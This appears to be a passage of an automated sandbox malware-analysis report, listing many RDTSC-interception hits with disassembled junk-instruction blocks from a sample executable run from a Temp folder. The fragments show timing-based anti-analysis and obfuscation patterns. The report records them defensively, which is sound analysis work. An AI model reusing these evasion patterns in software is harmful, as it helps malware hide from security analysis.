                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FAC0F second address: 6FAC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD3A4D6CB96h 0x0000000a pop esi 0x0000000b pushad 0x0000000c jmp 00007FD3A4D6CB9Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FAED4 second address: 6FAEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FAEDB second address: 6FAEE5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD3A4D6CBA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FAEE5 second address: 6FAEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FB1B3 second address: 6FB1BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FB1BA second address: 6FB1C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FB1C4 second address: 6FB1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FB31D second address: 6FB323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FB710 second address: 6FB720 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FD3A4D6CB96h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FB88D second address: 6FB8AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FB8AD second address: 6FB8C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FD3A4D6CB96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FD3A4D6CB96h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7013B3 second address: 7013B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 681BA5 second address: 681BBF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FD3A4D6CB98h 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FD3A4D6CB96h 0x00000018 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 681BBF second address: 681BC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 70999F second address: 7099A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7084FB second address: 7084FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 70864E second address: 708654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7087E3 second address: 7087ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD3A47FEE86h 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 708AD0 second address: 708B2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA8h 0x00000007 jmp 00007FD3A4D6CBA2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD3A4D6CBA9h 0x00000016 jmp 00007FD3A4D6CBA4h 0x0000001b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 708B2E second address: 708B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 708C9C second address: 708CA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 708CA0 second address: 708CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 708CA6 second address: 708CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 708CAC second address: 708CD0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD3A47FEE9Fh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 708E45 second address: 708E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 708E4A second address: 708E54 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD3A47FEE8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 708F98 second address: 708FD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD3A4D6CBA7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FD3A4D6CBA7h 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 708FD0 second address: 708FD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 709134 second address: 70916C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD3A4D6CB96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FD3A4D6CB9Eh 0x00000010 push edi 0x00000011 pop edi 0x00000012 jng 00007FD3A4D6CB96h 0x00000018 push esi 0x00000019 jmp 00007FD3A4D6CBA1h 0x0000001e ja 00007FD3A4D6CB96h 0x00000024 pop esi 0x00000025 pushad 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7080CD second address: 7080D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 70CD21 second address: 70CD27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 70CD27 second address: 70CD2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 70C5CF second address: 70C5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a push edi 0x0000000b pushad 0x0000000c jno 00007FD3A4D6CB96h 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FD3A4D6CB9Dh 0x0000001c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 70C5F3 second address: 70C5F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 70C74B second address: 70C751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 70C751 second address: 70C76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3A47FEE97h 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 70C76C second address: 70C771 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 70F220 second address: 70F224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 70F224 second address: 70F22A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 70F22A second address: 70F230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 712577 second address: 71259B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA3h 0x00000007 je 00007FD3A4D6CB98h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71259B second address: 7125AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3A47FEE8Ah 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71283B second address: 712841 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 712841 second address: 71287C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007FD3A47FEEA7h 0x00000011 jmp 00007FD3A47FEE8Ch 0x00000016 push edx 0x00000017 jmp 00007FD3A47FEE8Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 712AFA second address: 712AFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 712AFE second address: 712B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3A47FEE8Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 712B14 second address: 712B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 716E6F second address: 716EBB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FD3A47FEE90h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 jmp 00007FD3A47FEE93h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FD3A47FEE98h 0x00000020 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7160E9 second address: 7160F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FD3A4D6CB96h 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7160F3 second address: 716103 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edx 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 716266 second address: 71626A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71641F second address: 716425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 716425 second address: 71642B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71642B second address: 716430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7165AB second address: 7165B5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD3A4D6CB96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7165B5 second address: 7165C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A47FEE8Ch 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7165C5 second address: 7165C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7165C9 second address: 7165D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7165D4 second address: 7165DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 716A3D second address: 716A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 716A41 second address: 716A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 716A45 second address: 716A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD3A47FEE86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007FD3A47FEE86h 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 716A59 second address: 716A5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71CB77 second address: 71CB7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71CB7B second address: 71CB83 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71CB83 second address: 71CB88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71CB88 second address: 71CB8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71B2D4 second address: 71B308 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD3A47FEE98h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 jp 00007FD3A47FEE86h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71B308 second address: 71B32B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD3A4D6CBAEh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71B32B second address: 71B331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71B5F3 second address: 71B612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FD3A4D6CBA2h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71B612 second address: 71B623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FD3A47FEE8Ch 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71B623 second address: 71B637 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD3A4D6CBA6h 0x00000008 jmp 00007FD3A4D6CB9Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71B97D second address: 71B99D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE96h 0x00000007 jc 00007FD3A47FEE86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71B99D second address: 71B9A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71B9A3 second address: 71B9A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71B9A7 second address: 71B9AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CA2A8 second address: 6CA2AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CA2AE second address: 6CA30D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b add edi, dword ptr [ebp+122D3081h] 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FD3A4D6CB98h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d sub edi, dword ptr [ebp+122D17A7h] 0x00000033 xor edi, dword ptr [ebp+122D361Dh] 0x00000039 nop 0x0000003a pushad 0x0000003b pushad 0x0000003c jnl 00007FD3A4D6CB96h 0x00000042 jmp 00007FD3A4D6CB9Eh 0x00000047 popad 0x00000048 pushad 0x00000049 pushad 0x0000004a popad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CA30D second address: 6CA32E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 jmp 00007FD3A47FEE93h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6CA32E second address: 6CA332 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 71BDDE second address: 71BDE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 725BC8 second address: 725BE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FD3A4D6CB96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD3A4D6CB9Eh 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 725BE2 second address: 725C00 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD3A47FEE8Ch 0x00000008 jp 00007FD3A47FEE86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 push ecx 0x00000017 jl 00007FD3A47FEE86h 0x0000001d pop ecx 0x0000001e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 723CF7 second address: 723CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 723CFD second address: 723D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD3A47FEE8Fh 0x0000000c rdtsc
